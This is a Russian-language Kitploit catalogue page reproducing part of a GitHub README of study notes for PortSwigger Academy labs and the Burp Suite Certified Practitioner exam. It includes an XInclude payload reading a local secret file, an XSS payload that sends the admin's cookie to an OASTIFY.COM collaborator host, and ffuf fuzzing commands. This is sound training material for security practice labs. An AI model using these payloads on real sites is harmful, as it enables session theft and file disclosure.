Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/botesjuan/burp-suite-certified-practitioner-exam-study
Анализ уязвимостейЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеПодобранные РесурсыРазработка Полезной Нагрузки
Учебные Маршруты и Курсы
Лаборатории и Практика
Топ в Учебные Маршруты и Курсы №9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

Практические конспекты и пошаговые руководства по лабораторным работам PortSwigger Academy, охватывающие веб-уязвимости, пейлоады, энумерацию и стратегии сдачи экзамена BSCP.

Репозиторий
1.5k3851771 месяц назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Подготовка к экзамену Burp Suite Certified Practitioner

Это мои учебные заметки по более чем 110 лабораторным работам PortSwigger Academy. Я использовал эти лабораторные работы, чтобы сдать экзамен Burp Suite Certified Practitioner 2023 года. Моя квалификация BSCP.
Для получения дополнительной информации посетите PortSwigger Academy, чтобы получить последние учебные материалы.


СКАНИРОВАНИЕ - Перечисление
Фокусное сканирование
Сканирование нестандартных сущностей

ПЛАЦДАРМ - Этап 1
Обнаружение контента
DOM-XSS
XSS - межсайтовый скриптинг
Отравление веб-кэша
Заголовки Host
Контрабанда HTTP-запросов
Брутфорс
Аутентификация

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ - Этап 2
CSRF - захват аккаунта
Сброс пароля
SQLi - SQL-инъекция
JWT - JSON Web Tokens
Загрязнение прототипа
Тестирование API
Контроль доступа
Конечные точки GraphQL API
CORS - обмен ресурсами между источниками

ЭКСФИЛЬТРАЦИЯ ДАННЫХ - Этап 3
XXE - XML-сущности и инъекции
SSRF - подделка серверных запросов
SSTI - инъекция в серверные шаблоны
SSPP - серверное загрязнение прототипа
LFI - обход пути к файлу
Загрузка файлов
Десериализация
Инъекция команд ОС

ПРИЛОЖЕНИЕ
Python-скрипты
Payloads
Списки слов
Фокусное сканирование цели
Подход
Дополнительные учебные материалы

Мои советы по Burp

Я рекомендую пройти как можно больше испытаний Mystery lab challenge, чтобы проверить свои навыки и сократить время, необходимое для выявления уязвимостей, перед сдачей экзамена.
Я также считаю этот совет PortSwigger о пересдаче экзамена очень информативным.
Посмотрите CryptoCat - обзор Burp Suite Certified Professional (BSCP) + советы и приёмы, чтобы получить свежий взгляд на экзамен BSCP в 2024 году.




Купи мне кофе

Спасибо за поддержку кофе, \o/

Мой сертификат Burp Suite Certified Practitioner.


Сканирование

Перечисление веб-приложений начинается с начального и целенаправленного сканирования в рамках ограниченного по времени задания.

Фокусное сканирование
Сканирование нестандартных сущностей

Фокусное сканирование

Из-за жёсткого ограничения по времени во время заданий или экзамена сканируйте определённые точки вставки для конкретных запросов.

scan-defined-insertion-points

Сканер обнаружил уязвимость XML-инъекции в параметре storeId, и это позволило прочитать секретный файл Carlos.```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>Внеполосный XInclude-запрос, требуется размещённый DTD для чтения локального файла.```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: Быстрое обнаружение уязвимостей с помощью целевого сканирования

Сканирование нестандартных структур данных

Сканирование нестандартных структур данных с помощью функции Burp для сканирования выбранной точки вставки по выделенному тексту в ответах или запросах.

scan-selected-insertion-point

Определите уязвимость по результатам сканера Burp.
В данном случае, используя обнаруженную XSS, похитьте cookie-файлы администратора, создав полезную нагрузку в выявленной точке вставки.``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>Кодируйте ключевые символы в URL.

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)

>Используйте cookie администратора для доступа к админ-панели, подставив его в текущую сессию браузера.

[PortSwigger Lab: Сканирование нестандартных структур данных](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# Получение доступа  
  
# Обнаружение контента  

>Перечисление цели начинается с фаззинга веб-каталогов и файлов. Используйте либо инструменты Burp engagement tools, либо опцию обнаружения контента для поиска скрытых путей и файлов, либо используйте `FFUF` для перечисления веб-каталогов и файлов. Просмотр `robots.txt` или `sitemap.xml` может раскрыть содержимое.```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Инструмент для работы с Burp, обнаружение контента с использованием моего скомпилированного списка слов burp-labs-wordlist в качестве пользовательского списка файлов.

content-discovery.png

Скачать инструмент